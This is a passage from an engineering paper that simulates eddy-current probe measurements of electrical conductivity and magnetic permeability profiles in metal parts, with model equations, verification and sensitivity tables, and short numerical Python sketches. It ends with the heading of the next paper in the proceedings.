allowing some recommendations to be made regarding the choice of the probe's excitation modes, taking into account the specifics of the materials' magnetic properties. Keywords: Reconstruction of electrophysical parameters · metamodel · electrical conductivity · magnetic permeability · distinction of profiles
1 Introduction

Knowledge of the profiles of electrical conductivity and magnetic permeability in the near-surface layers of machine building parts provides complete information about the microstructure of their material, which largely determines the performance properties and reliability. It is effective to obtain such information by non-destructive testing methods as a result of simultaneous measurement of profiles directly during the technological
process of manufacturing parts or their operation. It is preferable to carry out measurements in real time without stopping the entire technological process as a whole. Such requirements can be met by using the eddy current method of non-destructive testing, which is illustrated, for example, by studies [1]. As a rule, such measurements systematically combine physical measurements using an eddy current probe and subsequent numerical signal processing, which involves the reconstruction of profiles as a result of inversion within the framework of solving a multiparameter inverse problem [2]. When implementing this signal processing approach, solutions of direct and inverse problems are required. This issue has been studied since the 1990s, and considerable experience in solving such problems has been accumulated, although not all arising questions can yet be considered fully resolved. In recent years, interest in the problem has revived due to the emergence of new opportunities resulting from the development of modern methods of computational mathematics, opening up new perspectives in the intensive intellectual processing of large amounts of data. A number of researchers have chosen the way of complicating the designs of measuring probes [3–5]. A number of additional elements are introduced into the design of the probes, most often additional coils. Such modifications lead to obtaining additional information about the measured electrophysical parameters and, consequently, to an increase in the computational resources required for its processing. The same disadvantage is inherent in another approach chosen by the authors of [1, 6–8], where multifrequency excitation of eddy currents in the object is used. Most importantly, both approaches are focused on processing the basic and additional information directly at the measurement stage, which is problematic for real-time implementation. The measurement techniques used by a number of researchers, relying on compensation and the phenomenon of invariance [1, 6–8], practically exclude the possibility of measuring both electrical conductivity and permeability profiles simultaneously. The method proposed by the authors in [12, 13], which uses additional information about the object obtained previously when processing a signal already physically measured as a result of a natural experiment, does not have these disadvantages. It is called the approximation method and stores the a priori obtained information in a so-called metamodel. This approach involves carrying out full-scale model studies of the structure of the test object, in which factual experimental measurement results are combined with methods and tools for creating an a priori mathematical model built on previously obtained data about the object. Note that the solution of the inverse problem of simultaneous reconstruction of both profiles from the signal of the eddy current probe in real time implies the existence of a highly productive model for solving the direct problem, i.e., determining the amplitude and phase of the signal for known profiles of electrophysical parameters. This function is performed by the metamodel. What is important is not only that the metamodel reproduces this dependence accurately, but also that it requires insignificant computational resources.
In turn, the metamodel can be built using computational technologies [14–18] based on an “accurate” electrodynamic model of the measurement process with a surface eddy current probe.
Computer Simulation of the Process of Profiles Measuring
413
Thus, the aim of this article is, using the created computer model of the measurement process with a surface eddy current probe, to establish the sensitivity of distinguishing close, continuously changing conductivity and magnetic permeability profiles in the near-surface layer of test objects made of magnetic and non-magnetic materials.
2 Materials and Methods

The basis for creating a computer model of the profile measuring process is the Uzal-Cheng-Dodd-Deeds mathematical model [19–25]. It has a rather cumbersome form and is presented in full by the authors in [26], where the assumptions adopted during its development are also formulated. We only note that it is used in a somewhat modified Theodoulidis version [19]. The mathematical model is made for a conventionally multilayer object with the number of layers L, where each t-th layer has electrical conductivity σt and magnetic permeability μt. The boundary between adjacent t-th and (t + 1)-th layers is located at the depth dt. The superposition of two components, namely, the field of the coil in free space without the presence of a conductor A(s) and the field created by the eddy currents A(ec) induced in the test object, forms the resulting electromagnetic field in the area below the excitation coil of the probe. Thus, taking into account the boundary conditions for different areas and using the Cheng matrix method [25], the mathematical model of the measurement process with a surface eddy current probe in the area z1 < z ≤ z2 has the following form:

A(r, z) = \int_0^{\infty} J_1(\kappa r) \left( C_s e^{\kappa z} + D_{ec} e^{-\kappa z} \right) d\kappa,   (1)

C_s = \frac{\mu_0 i_0}{2} \cdot \frac{\chi(\kappa r_1, \kappa r_2)}{\kappa^3} \left( e^{-\kappa z_1} - e^{-\kappa z_2} \right),

i_0 = N I (r_2 - r_1)^{-1} (z_2 - z_1)^{-1},

\chi(x_1, x_2) = \int_{x_1}^{x_2} x J_1(x)\,dx = \left[ x_1 J_0(x_1) - 2\sum_{k=0}^{\infty} J_{2k+1}(x_1) \right] - \left[ x_2 J_0(x_2) - 2\sum_{k=0}^{\infty} J_{2k+1}(x_2) \right],

D_{ec} = \frac{(\kappa \mu_{r1} - \lambda_1) V_{11}(1) + (\kappa \mu_{r1} + \lambda_1) V_{21}(1)}{(\kappa \mu_{r1} + \lambda_1) V_{11}(1) + (\kappa \mu_{r1} - \lambda_1) V_{21}(1)} \cdot C_s,

V(1) = T(1, 2) \cdot T(2, 3) \cdots T(L-2, L-1) \cdot T(L-1, L),

T_{11}(t, t+1) = \frac{1}{2} e^{(\lambda_t - \lambda_{t+1}) d_t} \left( 1 + \frac{\mu_t}{\mu_{t+1}} \cdot \frac{\lambda_{t+1}}{\lambda_t} \right),

T_{12}(t, t+1) = \frac{1}{2} e^{(\lambda_t + \lambda_{t+1}) d_t} \left( 1 - \frac{\mu_t}{\mu_{t+1}} \cdot \frac{\lambda_{t+1}}{\lambda_t} \right),

T_{21}(t, t+1) = \frac{1}{2} e^{-(\lambda_t + \lambda_{t+1}) d_t} \left( 1 - \frac{\mu_t}{\mu_{t+1}} \cdot \frac{\lambda_{t+1}}{\lambda_t} \right),

T_{22}(t, t+1) = \frac{1}{2} e^{(\lambda_{t+1} - \lambda_t) d_t} \left( 1 + \frac{\mu_t}{\mu_{t+1}} \cdot \frac{\lambda_{t+1}}{\lambda_t} \right),

\lambda_t = \left( \kappa^2 + j \omega \mu_0 \mu_t \sigma_t \right)^{1/2},

where z, r are the coordinates of the observation point in a cylindrical coordinate system; J0(x), J1(x), Jk(x) are cylindrical Bessel functions of the first kind of zero, first and k-th orders respectively; μ0 = 4π·10⁻⁷ H/m is the magnetic permeability of free space; N is the number of turns of the excitation coil; I is a sinusoidal excitation current with circular frequency ω; r1, r2 are the inner and outer radii of the excitation coil with a rectangular cross section respectively; z1 is the lift-off between the excitation coil and the surface of the test object; z2 is the distance from the top edge of the excitation coil to the surface of the object; μt, μt+1 are the magnetic permeabilities of the t-th and (t + 1)-th layers respectively; T11(t, t + 1), T12(t, t + 1), T21(t, t + 1), T22(t, t + 1) are elements of the electrophysical properties matrix of the test object.

The model is computationally expensive: it requires the allocation of sufficiently large resources and time for calculations. This is due to the need to calculate an improper integral of the first kind, the integrand of which contains a set of special Bessel functions, including those with a complex argument, as well as an embedded integral of the cylindrical Bessel function. This mathematical model uses piecewise constant representations of continuously changing profiles of electrophysical parameters and, for this reason, requires consideration of a conditionally multilayer near-surface zone of the test object. Moreover, in order to ensure the adequacy of the adopted simplification, it is necessary, in accordance with the recommendations of [20], to select a sufficiently large number of conditional layers, numbering in the tens.

The computer model is implemented in the MathCAD software package and takes into account all the features mentioned above. Verification of the software package has been carried out by modeling the excitation of eddy currents in objects for which analytical dependences [27] have been obtained that allow one to calculate the values of the vector potential of the electromagnetic field in the area of location of the pick-up coil of the eddy current probe. Test mathematical models for one-layer and two-layer test objects have the form:

A(r, z, \omega) = \frac{\mu_0 i_0}{2} \int_0^{\infty} \frac{J_1(ar)\,\chi(ar_1, ar_2)}{a^3} \left[ e^{-az} \left( e^{-az_1} - e^{-az_2} \right) R(a) + F(az_1, az_2, az) \right] da,   (2)

i_0 = \frac{N I}{(r_2 - r_1)(z_2 - z_1)},

F(az_1, az_2, az) = \begin{cases} e^{a(z_2 - z)} - e^{a(z_1 - z)}, & z \ge z_2 \\ 2 - e^{a(z - z_2)} - e^{a(z_1 - z)}, & z_2 \ge z \ge z_1 \\ e^{a(z - z_1)} - e^{a(z - z_2)}, & z_1 \ge z \ge 0 \end{cases}

\chi(x_1, x_2) = \int_{x_1}^{x_2} x J_1(x)\,dx,

where R(a) is a reflection coefficient. The formulas for determining this coefficient for one-layer and two-layer test objects respectively are given below:

R(a) = \frac{a - b_1}{a + b_1},

R(a) = \frac{(a + b_1)(b_1 - b_2) e^{-2\alpha_1 d_1} + (a - b_1)(b_1 + b_2)}{(a - b_1)(b_1 - b_2) e^{-2\alpha_1 d_1} + (a + b_1)(b_1 + b_2)},

\alpha_n = \sqrt{a^2 + j \omega \mu_0 \mu_n \sigma_n}, \quad b_n = \frac{\alpha_n}{\mu_n}, \quad n = 1, 2,
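The layered part of model (1) lends itself to a compact implementation. Below is a minimal, illustrative Python sketch (not the authors' MathCAD code) of the Cheng matrix product V(1) and of the factor multiplying C_s in D_ec; the function names, the array-based layer representation and the sign convention for the boundary depths d_t are assumptions of this sketch.

```python
import numpy as np

def layer_matrix_product(kappa, omega, mu, sigma, d):
    """Sketch of the Cheng matrix method: V(1) = T(1,2)*T(2,3)*...*T(L-1,L)
    for one spatial frequency kappa. mu, sigma are per-layer relative
    permeabilities and conductivities (length L); d holds the boundary
    depths d_t (length L-1), with the sign convention of the model above."""
    mu0 = 4e-7 * np.pi
    lam = np.sqrt(kappa**2 + 1j * omega * mu0 * np.asarray(mu) * np.asarray(sigma))
    V = np.eye(2, dtype=complex)
    for t in range(len(mu) - 1):
        r = (mu[t] / mu[t + 1]) * (lam[t + 1] / lam[t])
        p, q = lam[t] * d[t], lam[t + 1] * d[t]
        T = 0.5 * np.array([
            [np.exp(p - q) * (1 + r), np.exp(p + q) * (1 - r)],
            [np.exp(-p - q) * (1 - r), np.exp(q - p) * (1 + r)],
        ])
        V = V @ T
    return V

def reflection_factor(kappa, omega, mu, sigma, d):
    """Factor multiplying C_s in D_ec, built from V11(1) and V21(1)."""
    mu0 = 4e-7 * np.pi
    V = layer_matrix_product(kappa, omega, mu, sigma, d)
    lam1 = np.sqrt(kappa**2 + 1j * omega * mu0 * mu[0] * sigma[0])
    num = (kappa * mu[0] - lam1) * V[0, 0] + (kappa * mu[0] + lam1) * V[1, 0]
    den = (kappa * mu[0] + lam1) * V[0, 0] + (kappa * mu[0] - lam1) * V[1, 0]
    return num / den

# Example: two-layer object from the verification case below
print(reflection_factor(kappa=200.0, omega=2 * np.pi * 1e3,
                        mu=[1.0, 1.0], sigma=[9e6, 5e6], d=[1.5e-3]))
```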
where μn is the relative magnetic permeability of the material layer; σn is the electrical conductivity of the material layer; d1 is the thickness of the first layer of material.

The initial data used in the test calculations are as follows: r1 = 32·10⁻³ m; r2 = 50·10⁻³ m; z1 = 5·10⁻⁴ m; z2 = 18.5·10⁻³ m; d1 = 1.5·10⁻³ m; f = 1·10³ Hz; N = 100; I = 1 A. Electrophysical parameters of media for the single-layer test object: μ1 = 2; σ1 = 6·10⁶ S/m, and for the two-layer test object: μ1 = 1; μ2 = 1; σ1 = 9·10⁶ S/m; σ2 = 5·10⁶ S/m. The coordinates of the observation point of the vector potential: r = 25·10⁻³ m, z = 0.25·10⁻³ m.

The results of calculations using the two models [26] and [27] are summarized in Table 1, which also shows the relative errors characterizing the accuracy of the calculations. The comparative results confirm the adequacy of the created software.

Table 1. Verification results for the computer model (calculation of the vector potential A, Wb/m)

Control object    Model [27]                          Model [26]                          Relative error δ, % (amplitude/phase)
Single-layer      5.937182·10⁻⁶ − 4.869612·10⁻⁶·i     5.943273·10⁻⁶ − 4.869635·10⁻⁶·i     0.102 / 3.9·10⁻⁴
Two-layer         3.707182·10⁻⁶ − 4.03023·10⁻⁶·i      3.707182·10⁻⁶ − 4.03023·10⁻⁶·i      1.34·10⁻⁵ / 4.9·10⁻⁶
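For readers who want to reproduce the verification, the one-layer test model (2) can be evaluated numerically. The following Python sketch uses SciPy (the paper's implementation used MathCAD), and the truncation limit of the improper integral and the quadrature tolerances are assumptions of this sketch; the result should land close to the single-layer value in Table 1.

```python
import numpy as np
from scipy.integrate import quad
from scipy.special import j1

# Geometry, excitation and single-layer parameters from the test case above
r1, r2 = 32e-3, 50e-3          # coil inner/outer radii, m
z1, z2 = 5e-4, 18.5e-3         # lift-off and top-edge distance, m
N, I, f = 100, 1.0, 1e3        # turns, current (A), frequency (Hz)
mu1, sigma1 = 2.0, 6e6         # relative permeability, conductivity (S/m)
mu0 = 4e-7 * np.pi
omega = 2 * np.pi * f
i0 = N * I / ((r2 - r1) * (z2 - z1))

def chi(x1, x2):
    # chi(x1, x2) = integral of x*J1(x) dx from x1 to x2
    return quad(lambda x: x * j1(x), x1, x2)[0]

def F(a, z):
    # Piecewise source-field factor F(a*z1, a*z2, a*z) of model (2)
    if z >= z2:
        return np.exp(a * (z2 - z)) - np.exp(a * (z1 - z))
    if z >= z1:
        return 2 - np.exp(a * (z - z2)) - np.exp(a * (z1 - z))
    return np.exp(a * (z - z1)) - np.exp(a * (z - z2))

def integrand(a, r, z):
    b1 = np.sqrt(a**2 + 1j * omega * mu0 * mu1 * sigma1) / mu1
    R = (a - b1) / (a + b1)  # one-layer reflection coefficient
    refl = np.exp(-a * z) * (np.exp(-a * z1) - np.exp(-a * z2)) * R
    return j1(a * r) * chi(a * r1, a * r2) / a**3 * (refl + F(a, z))

def A(r, z, a_max=3000.0):
    # The improper integral is truncated at a_max (assumed adequate here)
    re = quad(lambda a: integrand(a, r, z).real, 1e-9, a_max, limit=500)[0]
    im = quad(lambda a: integrand(a, r, z).imag, 1e-9, a_max, limit=500)[0]
    return mu0 * i0 / 2 * (re + 1j * im)

print(A(25e-3, 0.25e-3))  # expected near 5.94e-6 - 4.87e-6j Wb/m (Table 1)
```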
3 Experiments

The developed computer model makes it possible to carry out research on distinguishing profiles of electrophysical parameters when performing measurements with a surface eddy current probe. It is of interest to carry out computational experiments for both magnetic and non-magnetic materials. For modeling we will set one of the possible types of profiles proposed in [20]:

\sigma(z) = \sigma_{in} + (\sigma_{fin} - \sigma_{in}) e^{-z^2/g^2},
\mu(z) = \mu_{in} + (\mu_{fin} - \mu_{in}) e^{-z^2/g^2},   (3)

where σin, μin are the initial values of conductivity and permeability respectively; σfin, μfin are the finite values of conductivity and permeability respectively; g is an approximation parameter, g = 0.001 (for σ(z)) and g = 0.002 (for μ(z)). We will choose the profiles contained in Table 2 as the basic ones for further research.

Table 2. Basic conductivity and permeability profiles for 30 layers

№     μ-profile    σ-profile ×10⁶, S/m
1     29.928       7.922389
2     29.711       7.694158
3     29.355       7.328663
4     28.863       6.846722
5     28.243       6.274646
6     27.504       5.641875
…     …            …
13    20.007       1.639252
14    18.766       1.298696
15    17.524       1.022114
16    16.291       0.802977
17    15.081       0.6334945
18    13.901       0.5054784
19    12.761       0.4110044
20    11.669       0.342862
21    10.629       0.29481
…     …            …
23    8.728        0.239326
24    7.871        0.224588
25    7.079        0.215057
26    6.351        0.209042
27    5.687        0.205322
28    5.085        0.20307
29    4.542        0.201736
30    4.057        0.200962
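The basic profiles of Table 2 can be regenerated from relation (3). In the sketch below, the layer grid (0.1 mm per layer) and the values σin = 0.2·10⁶ S/m, σfin = 8·10⁶ S/m, μin = 1, μfin = 30 are inferred from the tabulated numbers rather than stated in the text, so treat them as assumptions; with them, the computed values reproduce Table 2.

```python
import numpy as np

# Parameters inferred from Table 2 (assumptions of this sketch)
sigma_in, sigma_fin, g_sigma = 0.2e6, 8.0e6, 0.001
mu_in, mu_fin, g_mu = 1.0, 30.0, 0.002
z = 0.1e-3 * np.arange(1, 31)  # depth of the t-th layer, m (0.1 mm per layer)

sigma = sigma_in + (sigma_fin - sigma_in) * np.exp(-(z / g_sigma) ** 2)  # Eq. (3)
mu = mu_in + (mu_fin - mu_in) * np.exp(-(z / g_mu) ** 2)

print(sigma[0] / 1e6, mu[0])    # ~7.922389, ~29.928 -> first row of Table 2
print(sigma[-1] / 1e6, mu[-1])  # ~0.200962, ~4.057  -> last row of Table 2
```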
The electromotive force induced in the pick-up coil of the probe, with the number of turns equal to 50, radius r = 25·10⁻³ m, located at a height z = 0.25·10⁻³ m, is determined in accordance with the expression:

E = j\omega \oint_{l_{coil}} A\,dl = j\omega \cdot 2\pi r \cdot A(r, z),

where l_coil is the contour of the pick-up coil of the eddy current probe.
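Continuing the single-layer sketch above, the probe signal follows in a couple of lines; note that the expression above is written for a single circular contour, so scaling by the 50 turns of the pick-up coil is an assumption left to the reader here.

```python
# Complex EMF of a one-turn contour of radius r_pick at height z_pick,
# per the expression above: E = j*omega*2*pi*r*A(r, z).
r_pick, z_pick = 25e-3, 0.25e-3
E = 1j * omega * 2 * np.pi * r_pick * A(r_pick, z_pick)
print(abs(E), np.angle(E))  # amplitude (V) and phase (rad) of the signal
```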
Table 3 and Table 4 contain profiles of electrical conductivity and permeability respectively, close to the base ones, which have been obtained from the initial ones as a result of minor changes in σin, σfin and μin, μfin, followed by calculations using relation (3).

Table 3. Modified conductivity profiles for 30 layers (values ×10⁶, S/m)

№    Profile 1    Profile 2    Profile 3
1    8.001613     8.16006      8.159941
2    7.771099     7.924982     7.924512
3    7.40195      7.548523     7.54749
4    6.915189     7.052123     7.050349
5    6.337393     6.462885     6.460231
6    5.698294     5.811132     5.807504
7    5.028271     5.122784     5.123192
…    …            …            …
11   2.551198     2.601717     2.593295
12   2.068517     2.109478     2.100321
13   1.655645     1.688843     1.678644
14   1.311683     1.337657     1.327347
15   1.032335     1.052777     1.042042
16   0.811006     0.827066     0.815993
17   0.639829     0.652499     0.641166
18   0.510533     0.520642     0.509112
…    …            …            …
22   0.264292     0.269525     0.257620
23   0.241719     0.246505     0.234566
24   0.226824     0.231316     0.234566
25   0.217208     0.221509     0.219353
26   0.211132     0.215313     0.203327
27   0.207375     0.214818     0.19949
28   0.205101     0.209162     0.197167
29   0.203753     0.207788     0.195791
30   0.202972     0.206991     0.194993
Table 4. Modified permeability profiles for 30 layers

№    Profile 1    Profile 2    Profile 3
1    30.227       30.825       30.825
2    30.009       30.603       30.602
3    29.648       30.235       30.234
4    29.152       29.729       29.726
5    27.779       29.09        29.086
6    26.923       28.329       28.324
7    25.696       27.456       27.449
…    …            …            …
15   17.699       18.049       18.024
16   16.454       16.78        16.752
17   15.231       15.533       15.050
18   14.04        14.318       14.285
19   12.889       13.144       13.108
20   11.785       12.019       11.98
21   10.735       10.948       10.908
22   9.744        9.937        9.895
23   8.815        8.989        8.945
24   7.95         8.107        8.061
25   7.15         7.291        7.244
26   6.415        6.542        6.493
27   5.744        5.858        5.807
28   5.136        5.237        5.186
29   4.588        4.679        4.626
30   4.097        4.178        4.125
The profiles have been created as follows: profile 1 by increasing σin and σfin by 1% with subsequent calculation; profile 2 similarly, but by 3%; profile 3 by increasing σin and decreasing σfin by 3%. The purpose of the model experiments is to simulate measurements while varying the profiles, recording the values of the output signal of the probe, and drawing conclusions about the possibility of distinguishing the profiles. The simulation has been carried out at different frequencies of excitation of eddy currents.
4 Results

First of all, we will carry out calculations for objects made of non-magnetic material, i.e. when the relative magnetic permeability is equal to unity for all layers of the material. The simulation results are presented in Fig. 1 and Table 5, which illustrate the values of the probe's signals at different excitation frequencies, as well as in the difference signals for objects with different profiles (Fig. 2 and Table 6).

Table 5. Electromotive force of the eddy current transducer at different excitation frequencies

Frequency f, kHz    Basic profile                              Profile 2
                    Signal amplitude, V    Signal phase, rad   Signal amplitude, V    Signal phase, rad
1                   0.69                   2.235               0.682                  2.248
2                   0.96                   2.539               0.94                   2.553
3                   1.033                  2.71                1.025                  2.713
4                   1.055                  2.795               1.045                  2.797
5                   1.075                  2.833               1.043                  2.837
6                   1.067                  2.85                1.034                  2.851
7                   1.059                  2.849               1.027                  2.848
8                   1.053                  2.838               1.022                  2.835
9                   1.051                  2.821               1.02                   2.815
10                  1.052                  2.799               1.023                  2.792
15                  1.1                    2.676               1.075                  2.665
20                  1.189                  2.568               1.166                  2.557
Fig. 1. Measurement simulation results for an object with basic profiles of electrophysical parameters and the corresponding profile 1 of an object made of non-magnetic material
Table 6. Difference signal for a pair of profiles of non-magnetic test object at different excitation frequencies

Frequency f, kHz    Signal amplitude difference, V                Signal phase difference, rad
                    Profiles 1–2   Profiles 1–3   Profiles 2–3    Profiles 1–2   Profiles 1–3   Profiles 2–3
1                   0.005          0.001          −0.004          −0.008         −0.004         0.004
2                   0.013          0.005          −0.008          −0.009         −0.007         0.002
3                   0.017          0.008          −0.009          −0.007         −0.008         −0.001
4                   0.02           0.011          −0.009          −0.004         −0.007         −0.003
5                   0.021          0.013          −0.008          −0.002         −0.006         −0.004
6                   0.022          0.014          −0.008          −0.001         −0.006         −0.005
7                   0.021          0.015          −0.006          0.001          −0.005         −0.006
8                   0.02           0.015          −0.005          0.002          −0.004         −0.006
9                   0.02           0.015          −0.005          0.004          −0.002         −0.006
10                  0.019          0.016          −0.003          0.005          −0.001         −0.006
15                  0.017          0.017          0               0.007          0.001          −0.006
20                  0.015          0.016          0.001           0.007          0.003          −0.004
Fig. 2. Difference results of modeling measurements for objects made of non-magnetic material with different conductivity and permeability profiles
Similar calculations for objects made of magnetic material are shown in Fig. 3 and Table 7, with the only difference that permeability profile 3 (Table 4) is generated with a 5% increase in μin and μfin. In this modeling, the conductivity profile is fixed at the level of the basic one, and only the magnetic permeability profiles are changed. An analysis of the presented results of the computational experiments allows us to approximately estimate the sensitivity of the probe to distinguishing profiles of electrophysical parameters in the measurement control of objects made of magnetic and non-magnetic materials.
Table 7. Difference signal for a pair of profiles of magnetic test object at different excitation frequencies

Frequency f, kHz    Signal amplitude difference, V                Signal phase difference, rad
                    Profiles 1–2   Profiles 1–3   Profiles 2–3    Profiles 1–2   Profiles 1–3   Profiles 2–3
1                   −0.002         −0.005         −0.003          0.003          0.006          0.003
2                   −0.008         −0.016         −0.008          0.003          0.007          0.004
3                   −0.014         −0.027         −0.013          0.003          0.006          0.003
4                   −0.018         −0.035         −0.017          0.003          0.006          0.003
5                   −0.022         −0.043         −0.021          0.003          0.005          0.002
6                   −0.025         −0.05          −0.025          0.002          0.004          0.002
7                   −0.028         −0.055         −0.027          0.002          0.004          0.002
8                   −0.033         −0.06          −0.027          0.001          0.003          0.002
9                   −0.032         −0.064         −0.032          0.001          0.003          0.002
10                  −0.035         −0.069         −0.034          0.001          0.003          0.002
15                  −0.045         −0.089         −0.044          0.001          0.003          0.002
20                  −0.054         −0.106         −0.052          0.001          0.001          0
5 Discussion

Although the performed studies are selective and cannot be called complete, they nevertheless allow us to draw certain conclusions about the features of the measurement problem being solved. First of all, we note that, despite the minor variations of the parameters in the modified profiles (in absolute units this primarily concerns the magnetic permeability profiles), changes in the amplitude of the output signal of the probes that are sufficient for registration are observed. For non-magnetic materials they range from units to tens of mV; for magnetic ones, units of mV. In addition, certain frequency ranges of excitation of eddy currents exist in which the sensitivity of the probes to the analyzed profiles is higher than at other frequencies. For non-magnetic materials this range is 3–8 kHz, and for magnetic materials it is 8–10 kHz. Note that the choice of these frequency ranges has to be a compromise. More accurate recommendations can be obtained as a result of model calculations carried out in accordance with a developed plan of computer experiments based on the theory of experiment planning. And this can be done using the created computer model of the profile measurement process, which it is also expedient to use as an "accurate" electrodynamic model when constructing a highly efficient neural network metamodel necessary for solving the inverse problem.
Fig. 3. Difference results of simulation of measurements for objects made of magnetic material with different conductivity and permeability profiles
6 Conclusions

The main results of the study are as follows:
• The computer model of the measurement process with a surface eddy current probe has been created and verified on simple cases in which the near-surface layer of the test object is represented by a one- and two-layer approximation.
• The sensitivity to distinguishing slightly different profiles of electrophysical parameters has been studied in various frequency modes of excitation of eddy currents in magnetic and non-magnetic test objects.
• The rational frequency ranges of excitation of the surface probe have been determined, which provide the maximum possible levels of the output signal.

The results of the study can further be used in the construction of metamodels of the physical process of measuring the electrophysical characteristics of the near-surface layer of the test object with a surface eddy current probe.
References
1. Sabbagh, H.A., Murphy, R.K., Sabbagh, E.H., et al.: Computational Electromagnetics and Model-Based Inversion. SCIENTCOMP. Springer, New York (2013). https://doi.org/10.1007/978-1-4419-8429-6
2. Liu, G.R., Han, X.: Computational Inverse Techniques in Nondestructive Evaluation. CRC Press, Boca Raton (2003). https://doi.org/10.1201/9780203494486
3. Lu, M., Meng, X., Chen, L., et al.: Measurement of ferromagnetic slabs permeability based on a novel planar triple-coil sensor. IEEE Sens. J. 20(6), 2904–2910 (2020). https://doi.org/10.1109/JSEN.2019.2957212
4. Lahrech, A.C., Abdelhadi, B., Feliachi, M., et al.: Electrical conductivity identification of a carbon fiber composite material plate using a rotating magnetic field and multi-coil eddy current sensor. Eur. Phys. J. Appl. Phys. 83(2), 20901 (2018). https://doi.org/10.1051/epjap/2018170411
5. Avila, J.R.S., How, K.Y., Lu, M., Yin, W.: A novel dual modality sensor with sensitivities to permittivity, conductivity, and permeability. IEEE Sens. J. 18(1), 356–362 (2017). https://doi.org/10.1109/JSEN.2017.2767380
6. Lu, M., Xie, Y., Zhu, W., et al.: Determination of the magnetic permeability, electrical conductivity, and thickness of ferrite metallic plates using a multifrequency electromagnetic sensing system. IEEE Trans. Industr. Inf. 15(7), 4111–4119 (2018). https://doi.org/10.1109/TII.2018.2885406
7. Lu, M., Meng, X., Huang, R., et al.: Measuring lift-off distance and electromagnetic property of metal using dual-frequency linearity feature. IEEE Trans. Instrum. Meas. 70, 1–9 (2020). https://doi.org/10.1109/TIM.2020.3029348
8. Lu, M., Zhu, W., Yin, L., et al.: Reducing the lift-off effect on permeability measurement for magnetic plates from multifrequency induction data. IEEE Trans. Instrum. Meas. 67(1), 167–174 (2017). https://doi.org/10.1109/TIM.2017.2728338
9. Lu, M., Huang, R., Yin, W., et al.: Measurement of permeability for ferrous metallic plates using a novel lift-off compensation technique on phase signature. IEEE Sens. J. 9(17), 7440–7446 (2019). https://doi.org/10.1109/JSEN.2019.2916431
10. Lu, M., Xu, H., Zhu, W., et al.: Conductivity lift-off invariance and measurement of permeability for ferrite metallic plates. NDT & E Int. 95, 36–44 (2018). https://doi.org/10.1016/j.ndteint.2018.01.007
11. Yin, W., Meng, X., Lu, M., et al.: Permeability invariance phenomenon and measurement of electrical conductivity for ferrite metallic plates. Insight - Non-Destruct. Test. Cond. Monit. 61(8), 472–479 (2019). https://doi.org/10.1784/insi.2019.61.8.472
12. Halchenko, V.Y., Tychkov, V.V., Storchak, A.V., Trembovetska, R.V.: Reconstruction of surface radial profiles of the electrophysical characteristics of cylindrical objects during eddy current measurements with a priori data. The selection formation for the surrogate model construction. Ukr. Metrol. J. 1, 35–50 (2020). https://doi.org/10.24027/2306-7039.1.2020.204226
13. Halchenko, V.Y., Storchak, A.V., Trembovetska, R.V., Tychkov, V.V.: The creation of a surrogate model for restoring surface profiles of the electrophysical characteristics of cylindrical objects. Ukr. Metrol. J. 3, 27–35 (2020). https://doi.org/10.24027/2306-7039.3.2020.216824
14. Halchenko, V.Ya., Trembovetska, R.V., Tychkov, V.V., et al.: Additive neural network approximation of multidimensional response surfaces for surrogate synthesis of eddy-current probes. Przegląd Elektrotech. 9, 46–49 (2021). https://doi.org/10.15199/48.2021.09.10
15. Jiang, P., Zhou, Q., Shao, X.: Surrogate-Model-Based Design and Optimization. Springer Tracts in Mechanical Engineering. Springer, Singapore (2020). https://doi.org/10.1007/978-981-15-0731-1
16. Forrester, A.I.J., Sóbester, A., Keane, A.J.: Engineering Design Via Surrogate Modelling: A Practical Guide. Wiley, Chichester (2008). https://doi.org/10.1002/9780470770801
17. Bartz-Beielstein, T., Naujoks, B., Stork, J., Zaefferer, M.: Tutorial on surrogate-assisted modelling. D1.2. Synergy for Smart Multi-Objective Optimisation, Horizon 2020 (2016)
18. Georgiev, P.: Sensitivity analyses and robust ship design based on metamodels. Dissertation, Technical University of Varna (2008). http://dx.doi.org/10.13140/2.1.2639.1367
19. Theodoulidis, T.P., Kriezis, E.E.: Eddy Current Canonical Problems (with Applications to Nondestructive Evaluation). Tech Science Press, Forsyth (2006)
20. Uzal, E.: Theory of eddy current inspection of layered metals. Dissertation, Iowa State University (1992)
21. Bowler, N.: Eddy-Current Nondestructive Evaluation. SSMST. Springer, New York (2019). https://doi.org/10.1007/978-1-4939-9629-2
22. Lei, Y.Z.: General series expression of eddy-current impedance for coil placed above multilayer plate conductor. Chin. Phys. B 27(6), 060308 (2018). https://doi.org/10.1088/1674-1056/27/6/060308
23. Zhang, J., Yuan, M., Xu, Z., Kim, H.-J., Song, S.-J.: Analytical approaches to eddy current nondestructive evaluation for stratified conductive structures. J. Mech. Sci. Technol. 29(10), 4159–4165 (2015). https://doi.org/10.1007/s12206-015-0910-7
24. Theodoulidis, T.: Impedance of a coil above a planar conductor with an arbitrary continuous conductivity depth profile. Int. J. Appl. Electromagn. Mech. 59(4), 1179–1185 (2019). https://doi.org/10.3233/JAE-171122
25. Sun, J.L., Li, Z.L., Yuan, Y.M.: Construction and verification of analytical model for eddy current testing based on multi-layered conductive structures. Adv. Mater. Res. 1006–1007, 833–840 (2014). https://doi.org/10.4028/www.scientific.net/AMR.1006-1007.833
26. Tychkov, V.V., Halchenko, V.Y., Trembovetska, R.V., Tychkova, N.B.: Modeling the output signal of the eddy current probe using the Dodd's model. In: IX International Scientific and Technical Conference on Sensors, Devices and Systems-2021, pp. 7–9 (2021). https://er.chdtu.edu.ua/handle/ChSTU/3360. [in Ukr.]
27. Li, Y.: Theoretical and experimental investigation of electromagnetic NDE for defect characterization. Dissertation, Newcastle University (2008)
Irreversibility of Plastic Deformation Processes in Metals Arnold Kiv1,2 , Arkady Bryukhanov2 , Andrii Bielinskyi3 , Vladimir Soloviev3(B) , Taras Kavetskyy4,5 , Dmytro Dyachok2 , Ivan Donchev2 , and Viktor Lukashin2 1 Ben-Gurion University of the Negev, Beer Sheva, Israel 2 South Ukrainian National Pedagogical University named after K.D. Ushynsky, Odesa, Ukraine 3 Kryvyi Rih State Pedagogical University, Kryvyi Rih, Ukraine
[email protected] 4 Drohobych Ivan Franko State Pedagogical University, Drohobych, Ukraine 5 The John Paul II Catholic University of Lublin, Lublin, Poland
